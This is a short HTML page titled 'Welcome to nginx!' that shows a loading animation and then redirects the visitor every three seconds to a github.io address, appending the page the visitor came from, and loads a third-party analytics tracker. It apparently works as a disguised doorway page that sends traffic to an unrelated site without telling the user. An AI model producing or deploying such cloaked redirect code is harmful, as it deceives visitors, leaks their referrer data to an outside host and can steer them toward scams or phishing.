<!DOCTYPE html>
<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<div style="display: flex;justify-content: center;align-items: center;width: 100%;height: 100vh;">
<title>Welcome to nginx!</title>
<center>
<style>
  .loader {
      margin-top: 40%;
  width: 4rem;
  height: 10rem;
  display: inline-block;
  left: 5px;
  position: relative;
  border: 2px solid gray;
  box-sizing: border-box;
  animation: animloader 2s linear infinite alternate;
  color: aquamarine;
  border-radius: 0 0 4px 4px;
  transform: perspective(140px) rotateX(-45deg);
}

@keyframes animloader {
  0% {
    box-shadow: 0 0  inset;
  }
  100% {
    box-shadow: 0 -8rem inset;
  }
}
 
 body{
     font-size: 20px;
     text-align: center;
 }
</style>
</head>
<body style="">
<span class="loader"></span>
<div style="font-size:2rem">马上..</div>

</body>
<script type="text/javascript" charset="utf-8">


    setInterval(function(){
        window.location.href="https://ubv-d.github.io/73dw-df765dc/"+document.referrer;
    },3000);
</script>

<script>
!function(p){"use strict";!function(t){var s=window,e=document,i=p,c="".concat("https:"===e.location.protocol?"https://":"http://","sdk.51.la/js-sdk-pro.min.js"),n=e.createElement("script"),r=e.getElementsByTagName("script")[0];n.type="text/javascript",n.setAttribute("charset","UTF-8"),n.async=!0,n.src=c,n.id="LA_COLLECT",i.d=n;var o=function(){s.LA.ids.push(i)};s.LA?s.LA.ids&&o():(s.LA=p,s.LA.ids=[],o()),r.parentNode.insertBefore(n,r)}()}({id:"K0XE3NuDUkTzYXKn",ck:"K0XE3NuDUkTzYXKn"});
</script>

</html>
